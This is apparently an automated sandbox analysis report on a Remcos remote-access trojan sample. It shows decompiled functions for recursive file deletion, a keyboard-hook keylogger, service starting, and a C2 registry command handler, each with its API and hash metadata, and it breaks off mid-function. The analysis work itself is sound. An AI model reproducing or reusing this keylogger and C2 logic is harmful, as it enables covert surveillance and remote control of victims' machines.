                    				signed int _t56;
                    				intOrPtr _t57;
                    				char _t58;
                    				signed int _t63;
                    				char _t68;
                    				void _t72;
                    				void _t73;
                    				signed int _t78;
                    				signed int _t84;
                    				void* _t86;
                    				intOrPtr* _t89;
                    				signed short* _t90;
                    				void* _t91;
                    				signed int _t95;
                    				void* _t100;
                    				void* _t102;
                    				signed short* _t103;
                    				void* _t106;
                    				void* _t107;
                    				signed int _t108;
                    				intOrPtr* _t110;
                    				void* _t112;
                    				void* _t118;
                    				void* _t120;
                    				void* _t123;
                    				void* _t124;
                    
                    				_v12 = __ecx;
                    				_t103 = __ecx;
                    				_t118 =  &_v1052 - __ecx;
                    				do {
                    					_t52 =  *_t103 & 0x0000ffff;
                    					 *(_t118 + _t103) = _t52;
                    					_t103 =  &(_t103[1]);
                    				} while (_t52 != 0);
                    				_t89 =  &_v1052 - 2;
                    				do {
                    					_t53 =  *((intOrPtr*)(_t89 + 2));
                    					_t89 = _t89 + 2;
                    				} while (_t53 != 0);
                    				_t54 = L"\\*"; // 0x2a005c
                    				 *_t89 = _t54;
                    				_t106 =  &_v532 - __ecx;
                    				_t55 =  *0x465918; // 0x0
                    				 *((short*)(_t89 + 4)) = _t55;
                    				_t90 = __ecx;
                    				do {
                    					_t56 =  *_t90 & 0x0000ffff;
                    					 *(_t106 + _t90) = _t56;
                    					_t90 =  &(_t90[1]);
                    				} while (_t56 != 0);
                    				_t110 =  &_v532 - 2;
                    				do {
                    					_t57 =  *((intOrPtr*)(_t110 + 2));
                    					_t110 = _t110 + 2;
                    				} while (_t57 != 0);
                    				_t58 = "\\"; // 0x5c
                    				 *_t110 = _t58;
                    				_t86 = FindFirstFileW( &_v1052,  &_v1644); // _v1052 = <dir> + L"\\*"
                    				if(_t86 == 0xffffffff) { // INVALID_HANDLE_VALUE
                    					L34:
                    					return 0;
                    				}
                    				_t91 = 0;
                    				do {
                    					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                    					_t91 = _t91 + 2;
                    					 *(_t123 + _t91 - 0x41a) = _t63;
                    				} while (_t63 != 0);
                    				_v5 = 1;
                    				do {
                    					if(FindNextFileW(_t86,  &_v1644) == 0) {
                    						if(GetLastError() != 0x12) { // anything but ERROR_NO_MORE_FILES is a real failure
                    							L33:
                    							FindClose(_t86);
                    							goto L34;
                    						}
                    						_t68 = 0;
                    						_v5 = 0;
                    						goto L23;
                    					}
                    					if(E004176DE( &(_v1644.cFileName)) != 0) { // entry filter, presumably "." and ".." (its body is not shown here)
                    						L22:
                    						_t68 = _v5;
                    						goto L23;
                    					}
                    					_t107 =  &(_v1644.cFileName);
                    					_t120 = _t107;
                    					do {
                    						_t72 =  *_t107;
                    						_t107 = _t107 + 2;
                    					} while (_t72 != 0);
                    					_t108 = _t107 - _t120;
                    					_t112 =  &_v532 - 2;
                    					do {
                    						_t73 =  *(_t112 + 2);
                    						_t112 = _t112 + 2;
                    					} while (_t73 != 0);
                    					_t95 = _t108 >> 2;
                    					memcpy(_t112, _t120, _t95 << 2);
                    					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                    					_t124 = _t124 + 0x18;
                    					if((_v1644.dwFileAttributes & 0x00000010) == 0) { // not FILE_ATTRIBUTE_DIRECTORY
                    						if((_v1644.dwFileAttributes & 0x00000001) != 0) { // FILE_ATTRIBUTE_READONLY would make DeleteFileW fail
                    							SetFileAttributesW( &_v532, 0x80); // FILE_ATTRIBUTE_NORMAL
                    						}
                    						if(DeleteFileW( &_v532) == 0) {
                    							goto L33;
                    						} else {
                    							_t100 = 0;
                    							do {
                    								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                    								_t100 = _t100 + 2;
                    								 *(_t123 + _t100 - 0x212) = _t78;
                    							} while (_t78 != 0);
                    							goto L22;
                    						}
                    					}
                    					if(E00417754( &_v532) == 0) { // recurse into the subdirectory; its failure aborts the whole walk
                    						goto L33;
                    					}
                    					RemoveDirectoryW( &_v532);
                    					_t102 = 0;
                    					do {
                    						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                    						_t102 = _t102 + 2;
                    						 *(_t123 + _t102 - 0x212) = _t84;
                    					} while (_t84 != 0);
                    					goto L22;
                    					L23:
                    				} while (_t68 != 0);
                    				FindClose(_t86);
                    				return RemoveDirectoryW(_v12);
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
                    • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
                    • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
                    • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
                    • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
                    • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
                    • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
                    • GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
                    • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                    • Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
                    • Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                    • Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E10599700(struct HHOOK__** __ecx) {
                    				struct tagMSG _v32;
                    				char _v60;
                    				void* _v64;
                    				void* __edi;
                    				int _t7;
                    				void* _t8;
                    				struct HHOOK__* _t14;
                    				void* _t16;
                    				void* _t22;
                    				struct HHOOK__** _t34;
                    				signed int _t36;
                    				void* _t38;
                    
                    				_t38 = (_t36 & 0xfffffff8) - 0x38;
                    				_t34 = __ecx;
                    				 *0x46baf0 = __ecx;
                    				if( *((intOrPtr*)(__ecx)) != 0) {
                    					goto L3;
                    				} else {
                    					_t14 = SetWindowsHookExA(0xd, 0x40887b, GetModuleHandleA(0), 0);
                    					 *_t34 = _t14;
                    					_t43 = _t14;
                    					if(_t14 != 0) {
                    						while(1) {
                    							L3:
                    							_t7 = GetMessageA( &_v32, 0, 0, 0);
                    							__eflags = _t7;
                    							if(_t7 == 0) {
                    								break;
                    							}
                    							TranslateMessage( &_v32);
                    							DispatchMessageA( &_v32);
                    							__eflags =  *_t34;
                    							if( *_t34 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t8 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t16 = E105A8094(_t22,  &_v60, GetLastError());
                    						_t39 = _t38 - 0x18;
                    						E10598430(_t22, _t38 - 0x18, 0x45f968, 0, _t43, _t16);
                    						E10592EF2(_t22, _t39 - 0x14, 0x45f4f8);
                    						E105A7AEE(_t22, 0);
                    						E10592E35();
                    						_t8 = 1;
                    					}
                    				}
                    				return _t8;
                    			}

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1059971B
                    • SetWindowsHookExA.USER32(0000000D,0040887B,00000000), ref: 10599729
                    • GetLastError.KERNEL32 ref: 10599735
                      • Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08
                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10599783
                    • TranslateMessage.USER32(?), ref: 10599792
                    • DispatchMessageA.USER32(?), ref: 1059979D
                    Strings
                    • Keylogger initialization failure: error , xrefs: 10599749
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: f0dad1ed782043a170cd86187b4b1af230c9afc34384db41e4132afb83737165
                    • Instruction ID: 547a65e31f3447aea98685ba776a59df2a52692eb30be578e93fe0d8ad0ca4f9
                    • Opcode Fuzzy Hash: f0dad1ed782043a170cd86187b4b1af230c9afc34384db41e4132afb83737165
                    • Instruction Fuzzy Hash: 73118F75614242ABC3006FB99C0D86B7BFCEBC6692B50053DF896C2150EF30D604C7A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004163AD(char _a4) {
                    				void* _t5;
                    				signed int _t14;
                    				void* _t17;
                    				void* _t18;
                    
                    				_t14 = 0;
                    				_t5 = OpenSCManagerW(0, 0, 0x10);
                    				_t1 =  &_a4; // 0x416033
                    				_t18 = _t5;
                    				_t17 = OpenServiceW(_t18, E00401EEB(_t1), 0x10);
                    				if(_t17 != 0) {
                    					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                    					CloseServiceHandle(_t18);
                    					CloseServiceHandle(_t17);
                    				} else {
                    					CloseServiceHandle(_t18);
                    				}
                    				E00401EF0();
                    				return _t14;
                    			}

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID: 3`A
                    • API String ID: 276877138-3175782522
                    • Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                    • Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
                    • Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                    • Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E1059AE80(void* __ebx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAA _v468;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t45;
                    				signed int _t58;
                    				signed int _t59;
                    				signed int _t73;
                    				signed int _t75;
                    				char* _t108;
                    				signed int _t109;
                    				char* _t129;
                    				void* _t134;
                    				void* _t135;
                    				void* _t136;
                    				void* _t137;
                    
                    				_t142 = __eflags;
                    				_t134 = __edi;
                    				_t89 = __ebx;
                    				E10592F43(__ebx,  &_v100);
                    				E10592F43(__ebx,  &_v76);
                    				E10592F43(__ebx,  &_v28);
                    				_t45 = E10592EF2(_t89,  &_v124, 0x45fd34);
                    				E10592E3F( &_v28, _t46, _t135, E10598430(_t89,  &_v52, E105CA6F8(_t89, __eflags, 0x45fc64), _t134, _t142, _t45));
                    				E10592E35();
                    				E10592E35();
                    				_t128 =  &_v28;
                    				_t136 = FindFirstFileA(E10592E03(E105983C6( &_v124,  &_v28, _t142, 0x45fc24)),  &_v468);
                    				E10592E35();
                    				_t143 = _t136 - 0xffffffff;
                    				if(_t136 != 0xffffffff) {
                    					while(1) {
                    						L15:
                    						__eflags = FindNextFileA(_t136,  &_v468);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                    						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						}
                    						_t108 =  &(_v468.cFileName);
                    						__eflags =  *_t108 - 0x2e;
                    						if( *_t108 != 0x2e) {
                    							L5:
                    							_t129 =  &(_v468.cFileName);
                    							_t109 = 0;
                    							__eflags = 0;
                    							while(1) {
                    								_t58 =  *(_t129 + _t109) & 0x000000ff;
                    								__eflags = _t58 -  *((intOrPtr*)(0x45fd84 + _t109));
                    								_t128 =  &(_v468.cFileName);
                    								if(_t58 !=  *((intOrPtr*)(0x45fd84 + _t109))) {
                    									break;
                    								}
                    								_t109 = _t109 + 1;
                    								__eflags = _t109 - 3;
                    								if(_t109 != 3) {
                    									continue;
                    								}
                    								_t59 = 0;
                    								L10:
                    								__eflags = _t59;
                    								if(__eflags != 0) {
                    									E10592E3F( &_v100, _t61, _t136, E105961B1(_t89,  &_v52, E105983C6( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, 0x45fd88));
                    									E10592E35();
                    									E10592E35();
                    									_t128 = E105983C6( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                    									E10592E3F( &_v76, _t67, _t136, E105961B1(_t89,  &_v148, _t67, _t134, __eflags, 0x45fd98));
                    									E10592E35();
                    									E10592E35();
                    									_t73 = DeleteFileA(E10592E03( &_v100));
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										GetLastError();
                    									}
                    									_t75 = DeleteFileA(E10592E03( &_v76));
                    									__eflags = _t75;
                    									if(_t75 == 0) {
                    										GetLastError();
                    									}
                    								}
                    								goto L15;
                    							}
                    							asm("sbb eax, eax");
                    							_t59 = _t58 | 0x00000001;
                    							__eflags = _t59;
                    							goto L10;
                    						}
                    						__eflags =  *(_t108 + 1) & 0x000000ff;
                    						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                    							continue;
                    						}
                    						goto L5;
                    					}
                    					E10592EF2(_t89, _t137 - 0x18, 0x45fda4);
                    					E1059B55D(_t89, _t128, __eflags);
                    					FindClose(_t136);
                    					goto L17;
                    				} else {
                    					FindClose(_t136);
                    					E10592EF2(_t89, _t137 - 0x18, 0x45fd60);
                    					E1059B55D(_t89,  &_v28, _t143);
                    					L17:
                    					E10592E35();
                    					E10592E35();
                    					E10592E35();
                    					return 1;
                    				}
                    			}

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,0045FD34), ref: 1059AEFF
                    • FindClose.KERNEL32(00000000), ref: 1059AF19
                    • FindNextFileA.KERNEL32(00000000,?), ref: 1059B050
                    • FindClose.KERNEL32(00000000), ref: 1059B076
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID:
                    • API String ID: 1164774033-0
                    • Opcode ID: 5bb5e788937b6c8f61039caf28d1d2a031d08fad4a54c4f0328ff985a04a4a70
                    • Instruction ID: 13be1a51fce84d4af6a89ac577a7864eb919f1abeae0be0c113752aa32fd8d0d
                    • Opcode Fuzzy Hash: 5bb5e788937b6c8f61039caf28d1d2a031d08fad4a54c4f0328ff985a04a4a70
                    • Instruction Fuzzy Hash: E35191349001595BDB04EB70DC9AAFE7F78EF95382F9000A9F40662191FF746B4DCA92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E1059B09B(void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				struct _WIN32_FIND_DATAA _v444;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t35;
                    				signed int _t56;
                    				signed int _t57;
                    				long _t68;
                    				char* _t92;
                    				signed int _t93;
                    				void* _t102;
                    				char* _t105;
                    				void* _t108;
                    				void* _t109;
                    				void* _t110;
                    				void* _t111;
                    
                    				_t116 = __eflags;
                    				_t108 = __edi;
                    				E10592F43(0,  &_v52);
                    				E10592F43(0,  &_v28);
                    				_t35 = E10592EF2(0,  &_v100, 0x45fd34);
                    				E10592E3F( &_v28, _t36, _t109, E10598430(0,  &_v76, E105CA6F8(0, __eflags, 0x45fc64), _t108, _t116, _t35));
                    				E10592E35();
                    				E10592E35();
                    				_t104 =  &_v28;
                    				_t110 = FindFirstFileA(E10592E03(E105983C6( &_v100,  &_v28, _t116, 0x45fc24)),  &_v444);
                    				E10592E35();
                    				_t117 = _t110 - 0xffffffff;
                    				if(_t110 != 0xffffffff) {
                    					__eflags = FindNextFileA(_t110,  &_v444);
                    					if(__eflags == 0) {
                    						L17:
                    						E10592EF2(0, _t111 - 0x18, 0x45fdc8);
                    						E1059B55D(0, _t104, __eflags);
                    						FindClose(_t110);
                    						goto L18;
                    					} else {
                    						__eflags = 0;
                    						do {
                    							__eflags = _v444.dwFileAttributes & 0x00000010;
                    							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                    								goto L16;
                    							} else {
                    								_t92 =  &(_v444.cFileName);
                    								__eflags =  *_t92 - 0x2e;
                    								if( *_t92 != 0x2e) {
                    									L8:
                    									_t105 =  &(_v444.cFileName);
                    									_t93 = 0;
                    									while(1) {
                    										_t56 =  *(_t105 + _t93) & 0x000000ff;
                    										__eflags = _t56 -  *((intOrPtr*)(0x45fd84 + _t93));
                    										_t104 =  &(_v444.cFileName);
                    										if(_t56 !=  *((intOrPtr*)(0x45fd84 + _t93))) {
                    											break;
                    										}
                    										_t93 = _t93 + 1;
                    										__eflags = _t93 - 3;
                    										if(_t93 != 3) {
                    											continue;
                    										} else {
                    											_t57 = 0;
                    										}
                    										L13:
                    										__eflags = _t57;
                    										if(__eflags == 0) {
                    											goto L16;
                    										} else {
                    											_t104 = E105983C6( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                    											E10592E3F( &_v52, _t59, _t110, E105961B1(0,  &_v76, _t59, _t108, __eflags, 0x45fde8));
                    											E10592E35();
                    											E10592E35();
                    											__eflags = DeleteFileA(E10592E03( &_v52));
                    											if(__eflags != 0) {
                    												_t102 = _t111 - 0x18;
                    												_push(0x45fdf8);
                    												goto L2;
                    											} else {
                    												_t68 = GetLastError();
                    												__eflags = _t68 != 0;
                    												if(_t68 != 0) {
                    													FindClose(_t110);
                    												} else {
                    													goto L16;
                    												}
                    											}
                    										}
                    										goto L19;
                    									}
                    									asm("sbb eax, eax");
                    									_t57 = _t56 | 0x00000001;
                    									__eflags = _t57;
                    									goto L13;
                    								} else {
                    									__eflags =  *(_t92 + 1) & 0x000000ff;
                    									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                    										goto L16;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							goto L19;
                    							L16:
                    							__eflags = FindNextFileA(_t110,  &_v444);
                    						} while (__eflags != 0);
                    						goto L17;
                    					}
                    				} else {
                    					FindClose(_t110);
                    					_t102 = _t111 - 0x18;
                    					_push(0x45fdc8);
                    					L2:
                    					E10592EF2(0, _t102);
                    					E1059B55D(0, _t104, _t117);
                    					L18:
                    				}
                    				L19:
                    				E10592E35();
                    				E10592E35();
                    				return 1;
                    			}

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,0045FD34), ref: 1059B113
                    • FindClose.KERNEL32(00000000), ref: 1059B129
                    • FindNextFileA.KERNEL32(00000000,?), ref: 1059B153
                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 1059B1FB
                    • GetLastError.KERNEL32 ref: 1059B205
                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 1059B219
                    • FindClose.KERNEL32(00000000), ref: 1059B23F
                    • FindClose.KERNEL32(00000000), ref: 1059B260
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                    • String ID:
                    • API String ID: 532992503-0
                    • Opcode ID: f8bd42b83f37baca371e5719e5b32f5f22c1263342ce782499c62eadd2d69499
                    • Instruction ID: cd20c419ec5d182672dffc60be78931a74d21a02de86b2b8deb12530481f8b87
                    • Opcode Fuzzy Hash: f8bd42b83f37baca371e5719e5b32f5f22c1263342ce782499c62eadd2d69499
                    • Instruction Fuzzy Hash: 6641B5349002595BEB04EB74DD9A9FE7F79EF55282F9001A9F40292191EF306B4DC791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			// Registry command handler of the Remcos payload (detection per the report header).
                    			// The first character of the command string (*_t77, compared against '5'..'9' below)
                    			// selects the action; single-character result codes ("1".."9") are built with
                    			// E00402084 and sent to the C2 via E00404AA4, which wraps send() (see APIs below).
                    			E00411205(void* __edx, void* __eflags, char _a8) {
                    				char _v36;
                    				char _v48;
                    				char _v52;
                    				char _v68;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				struct _SECURITY_ATTRIBUTES _v104;
                    				char _v108;
                    				void* _v112;
                    				char _v120;
                    				intOrPtr _v124;
                    				char _v128;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t77;
                    				void* _t88;
                    				void* _t99;
                    				void* _t101;
                    				void* _t102;
                    				void* _t104;
                    				signed int _t105;
                    				void* _t113;
                    				void* _t120;
                    				void* _t121;
                    				void* _t123;
                    				void* _t127;
                    				signed short* _t135;
                    				void* _t137;
                    				void* _t141;
                    				void* _t146;
                    				void* _t150;
                    				void* _t152;
                    				void* _t153;
                    				void* _t155;
                    				signed int _t156;
                    				intOrPtr* _t158;
                    				void* _t160;
                    				void* _t162;
                    				void* _t163;
                    				void* _t165;
                    				void* _t171;
                    				void* _t173;
                    				void* _t174;
                    				void* _t176;
                    				void* _t181;
                    				void* _t182;
                    				long _t185;
                    				signed short* _t195;
                    				void* _t205;
                    				void* _t217;
                    				void* _t233;
                    				void* _t247;
                    				signed int _t258;
                    				signed int _t313;
                    				signed int _t323;
                    				signed int _t326;
                    				void* _t328;
                    				void* _t330;
                    				void* _t335;
                    				void* _t337;
                    				void* _t339;
                    				signed int _t340;
                    				void* _t341;
                    				signed int _t347;
                    				signed int _t348;
                    				void* _t351;
                    				void* _t352;
                    				void* _t353;
                    				void* _t356;
                    				void* _t361;
                    				void* _t362;
                    				void* _t364;
                    				void* _t365;
                    				void* _t367;
                    				void* _t368;
                    				void* _t369;
                    				void* _t370;
                    				void* _t372;
                    				void* _t374;
                    				void* _t379;
                    
                    				_t379 = __eflags;
                    				_t320 = __edx;
                    				_push(_t203);
                    				_t77 = E00401F95( &_a8);
                    				_push(0xffffffff);
                    				_t328 = 4;
                    				_push(_t328);
                    				_push( &_v52);
                    				E004042A6( &_a8);
                    				_t351 = (_t348 & 0xfffffff8) - 0x44;
                    				E004020EC(_t203, _t351, __edx, _t379, 0x46c238);
                    				_t352 = _t351 - 0x18;
                    				E004020EC(_t203, _t352, __edx, _t379,  &_v68);
                    				E00417478( &_v108, __edx);
                    				_t353 = _t352 + 0x30;
                    				_t335 =  *_t77 - 0x35; // first command character minus '5'; the chained "- 1" tests below select '6', '7', '8', '9'
                    				if(_t335 == 0) {
                    					E00401F6D(_t203,  &_v76);
                    					__eflags = E004021F5( &_v88) - 1;
                    					if(__eflags > 0) {
                    						E00409DC9(_t203,  &_v80, E00401F95(E00401E49( &_v88, _t320, __eflags, 1)));
                    					}
                    					E004020EC(_t203, _t353 - 0x18, _t320, __eflags, E00401E49( &_v88, _t320, __eflags, 0));
                    					_t88 = E00401EEB( &_v84);
                    					_t320 = 1;
                    					_t217 = _t88;
                    					L37:
                    					E00411046(_t217, _t320, _t386);
                    					L38:
                    					E00401EF0();
                    					L39:
                    					E00401E74( &_v88, _t320);
                    					E00401FC7();
                    					E00401FC7();
                    					return 0;
                    				}
                    				_t337 = _t335 - 1;
                    				if(_t337 == 0) {
                    					_t99 = E00401F95(E00401E49( &_v88, __edx, __eflags, 2));
                    					_t101 = E00401F95(E00401E49( &_v92, __edx, __eflags, 1));
                    					_t330 = 0;
                    					_t102 = E00401E49( &_v96, __edx, __eflags, 0);
                    					_t356 = _t353 - 0x18;
                    					E004020EC(_t203, _t356, _t320, __eflags, _t102);
                    					_t104 = E00410FB5(_t203, __eflags, _t99);
                    					_t320 = _t101;
                    					_t105 = E00410D5C(_t104, _t101);
                    					_t358 = _t356 + 0x18 - 0x18;
                    					_t233 = _t356 + 0x18 - 0x18;
                    					__eflags = _t105;
                    					if(__eflags == 0) {
                    						_push("2");
                    						L33:
                    						E00402084(_t203, _t233);
                    						E00404AA4(_t203, 0x46c700, _t320, __eflags);
                    						goto L39;
                    					}
                    					_push("1");
                    					L20:
                    					E00402084(_t203, _t233);
                    					E00404AA4(_t203, 0x46c700, _t320, __eflags);
                    					E004020EC(_t203, _t358 - 0x18, _t320, __eflags, E00401E49( &_v120, _t320, __eflags, _t330));
                    					_t113 = E00401F95(E00401E49( &_v128, _t320, __eflags, 1));
                    					_t320 = 0;
                    					E00411046(_t113, 0, __eflags);
                    					goto L39;
                    				}
                    				_t339 = _t337 - 1;
                    				if(_t339 == 0) {
                    					E0040427F(_t203,  &_v80, E00401F95(E00401E49( &_v88, __edx, __eflags, 1)));
                    					// '7': delete a key. SHDeleteKeyW is resolved at runtime rather than imported, and the pointer is cached in a global.
                    					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                    					_t120 = E00401EEB( &_v84);
                    					_t121 = E00401E49( &_v96, _t320, __eflags, 0);
                    					_t361 = _t353 - 0x18;
                    					E004020EC(_t203, _t361, _t320, __eflags, _t121);
                    					_t123 = E00410FB5(_t203, __eflags, _t120);
                    					_t362 = _t361 + 0x18;
                    					__eflags =  *0x46bd64(_t123); // SHDeleteKeyW(hKey): non-zero (error) replies "9"; success strips the last "\\" component and replies "8" after re-listing the parent key via E00411046
                    					if(__eflags != 0) {
                    						_t247 = _t362 - 0x18;
                    						_push("9");
                    						L12:
                    						E00402084(_t203, _t247);
                    						E00404AA4(_t203, 0x46c700, _t320, __eflags);
                    						goto L38;
                    					}
                    					_t127 = E00402489();
                    					_t340 = 2;
                    					_t203 = E0041184C( &_v84, "\\", _t127 - _t340);
                    					__eflags = _t203 - 0xffffffff;
                    					if(__eflags != 0) {
                    						_t50 = _t203 + 1; // 0x1
                    						_push( ~(__eflags > 0) | _t50 * _t340);
                    						_v100 = E0042F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
                    						_t135 = E00401EEB(E00407309( &_v84,  &_v36, 0, _t203));
                    						_t203 = _v112;
                    						_t323 = _v112 - _t135;
                    						__eflags = _t323;
                    						do {
                    							_t258 =  *_t135 & 0x0000ffff;
                    							 *(_t323 + _t135) = _t258;
                    							_t135 = _t135 + _t340;
                    							__eflags = _t258;
                    						} while (__eflags != 0);
                    						E00401EF0();
                    						_t137 = E00401E49( &_v96, _t323, __eflags, 0);
                    						_t364 = _t362 - 0x18;
                    						E004020EC(_t203, _t364, _t323, __eflags, _t137);
                    						_t320 = 0;
                    						__eflags = 0;
                    						E00411046(_t203, 0, 0);
                    						E0042F4CF(_t203);
                    						_t365 = _t364 + 0x1c;
                    						L28:
                    						_t247 = _t365 - 0x18;
                    						_push("8");
                    						goto L12;
                    					}
                    					_t141 = E00401E49( &_v96, _t320, __eflags, 0);
                    					_t367 = _t362 - 0x18;
                    					E004020EC(_t203, _t367, _t320, __eflags, _t141);
                    					_t320 = 0;
                    					E00411046(0, 0, __eflags);
                    					_t365 = _t367 + 0x18;
                    					goto L28;
                    				}
                    				_t341 = _t339 - 1;
                    				if(_t341 == 0) {
                    					// '8': set a value. _t146 is the value type: 4 = REG_DWORD (E00410BF8), 0xb = REG_QWORD (E00410C3C),
                    					// anything else is written as a data buffer with its length from E00402489 (E00410B08). Result: "4" ok, "5" failed.
                    					_t146 = E00436769(_t144, E00401F95(E00401E49( &_v88, __edx, __eflags, 3)));
                    					__eflags = _t146 - _t328;
                    					if(__eflags == 0) {
                    						_push( *((intOrPtr*)(E00401F95(E00401E49( &_v92, __edx, __eflags, _t328)))));
                    						_t150 = E00401F95(E00401E49( &_v92, __edx, __eflags, 2));
                    						_t152 = E00401F95(E00401E49( &_v96, _t320, __eflags, 1));
                    						_t330 = 0;
                    						__eflags = 0;
                    						_t153 = E00401E49( &_v100, _t320, 0, 0);
                    						_t368 = _t353 - 0x18;
                    						E004020EC(_t203, _t368, _t320, __eflags, _t153);
                    						_t155 = E00410FB5(_t203, __eflags, _t150);
                    						_t369 = _t368 + 0x18;
                    						_t320 = _t152;
                    						_t156 = E00410BF8(_t155, _t152);
                    					} else {
                    						__eflags = _t146 - 0xb;
                    						if(__eflags == 0) {
                    							_t158 = E00401F95(E00401E49( &_v92, __edx, __eflags, _t328));
                    							_t160 = E00401F95(E00401E49( &_v92, __edx, __eflags, 2));
                    							_t162 = E00401F95(E00401E49( &_v96, _t320, __eflags, 1));
                    							_t330 = 0;
                    							_t163 = E00401E49( &_v100, _t320, __eflags, 0);
                    							_t370 = _t353 - 0x18;
                    							E004020EC(_t203, _t370, _t320, __eflags, _t163);
                    							_t165 = E00410FB5(_t203, __eflags, _t160);
                    							_t320 = _t162;
